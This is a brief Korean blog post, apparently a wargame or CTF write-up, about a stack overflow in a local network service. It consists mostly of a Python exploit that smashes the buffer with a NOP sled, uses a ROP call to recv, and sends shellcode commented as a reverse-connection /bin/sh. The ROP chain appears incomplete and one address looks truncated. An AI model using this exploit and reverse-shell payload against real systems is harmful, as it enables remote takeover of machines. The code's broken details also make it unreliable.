환경 : ubuntu 13.10/ aslr,nx on
IDA로 분석중 저렇게 stack overflow가 나는 부분을 발견하였다.
a5는 약 400바이트가 넘어가는 값이다.
dest가 흘러넘치게된다.
#!/usr/bin/python
from socket import *
from struct import *
s=socket(AF_INET,SOCK_STREAM)
s.connect(('127.0.0.1',8888))
p=lambda x:pack("<I",x)
shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e" #reverse connection /bin/sh
shellcode += "\x68\x00\x00\x00\x00\x66\x68\x7a\x69\x66\x53\x6a\x10\x51\x50\x89\xe1"
shellcode += "\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50"
shellcode += "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
dummysize=240
custom_stack=0x0804b80
recv_plt=0x08048780
pppr=0x804947d
payload = ""
payload += "\x90"*dummysize
payload += p(recv_plt)
payload += p(pppr)
payload += p(4)
payload += p(custom_stack)
payload += p(len(shellcode))
s.recv(1024)
s.send("write "+payload)
s.recv(1024)
s.send(shellcode)
s.close()
pwned!!
댓글 없음:
댓글 쓰기